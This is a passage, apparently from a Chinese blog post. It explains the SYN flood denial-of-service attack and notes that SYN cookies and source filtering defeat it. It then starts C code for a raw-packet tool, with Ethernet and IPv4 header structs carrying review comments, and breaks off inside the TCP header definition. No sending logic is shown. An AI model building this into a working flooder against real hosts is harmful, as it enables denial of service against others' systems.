syn_flood攻击的原理很简单:向目的主机发送大量建立TCP连接的请求(SYN),但源IP地址是乱填的,所以本机不会收到TCP应答(SYN+ACK);而其它主机收到TCP应答后,由于之前并没有请求过TCP连接,所以会丢弃这个应答。被攻击的主机要为每个请求保留一个半开连接并空等一段时间,资源被白白浪费。
当然这也只是理论上的结果。实际上在现在,这种攻击肯定是行不通的:操作系统普遍支持 SYN cookies 等半开连接保护机制,网络入口处的源地址过滤也会丢弃伪造源地址的数据包。
#include <stdlib.h>
#include <stdio.h>
#include <pcap.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <string.h>
#include <stdio.h>
#include <wtypes.h>
#pragma comment(lib,"ws2_32.lib")
/* Constant 0x12121212. Presumably a TCP sequence-number value, judging by the
 * name; its use is outside this excerpt -- confirm. */
#define SEQ 0x12121212
/* Size of the libpcap error-message buffer.
 * NOTE(review): <pcap.h> already defines PCAP_ERRBUF_SIZE as 256, so this is a
 * redundant (identical) redefinition. */
#define PCAP_ERRBUF_SIZE 256
/*
 * Ethernet frame header: two 6-byte addresses followed by a 16-bit type
 * field, 14 bytes in total with no padding between members.
 *
 * NOTE(review): the type field is big-endian on the wire, so code that fills
 * or reads eh_type presumably needs htons()/ntohs() -- confirm at the use
 * sites, which are outside this excerpt.
 */
struct et_header {
    unsigned char  eh_dst[6]; /* destination address */
    unsigned char  eh_src[6]; /* source address */
    unsigned short eh_type;   /* identifies the next-layer protocol; 0x0800 for IP */
};

typedef struct et_header ET_HEADER;
/*
 * IPv4 header, fixed part only (the struct has no member for IP options).
 *
 * NOTE(review): the layout matches the 20-byte wire format only where
 * unsigned long is 32 bits wide. That holds for Windows builds, which the
 * winsock2.h include suggests is the target. On LP64 platforms unsigned long
 * is 8 bytes, so ip_src and ip_dst would be mis-sized and mis-placed; a
 * fixed-width 32-bit type would make the layout explicit.
 * Multi-byte fields are big-endian on the wire; byte-order handling is not
 * visible in this excerpt.
 */
struct ip_header {
    unsigned char  ver_ihl;        /* version (high 4 bits) + header length (low 4 bits) */
    unsigned char  tos;            /* type of service */
    unsigned short tlen;           /* total length */
    unsigned short identification; /* identification */
    unsigned short flags_fo;       /* flags (3 bits) + fragment offset (13 bits) */
    unsigned char  ttl;            /* time to live */
    unsigned char  proto;          /* protocol carried in the payload */
    unsigned short crc;            /* header checksum */
    unsigned long  ip_src;         /* source address */
    unsigned long  ip_dst;         /* destination address */
};

typedef struct ip_header IPHEADER;
typedef struct ip_header *PIPHEADER;
//TCP包头结构体
typedef struct tcp_header {
WOR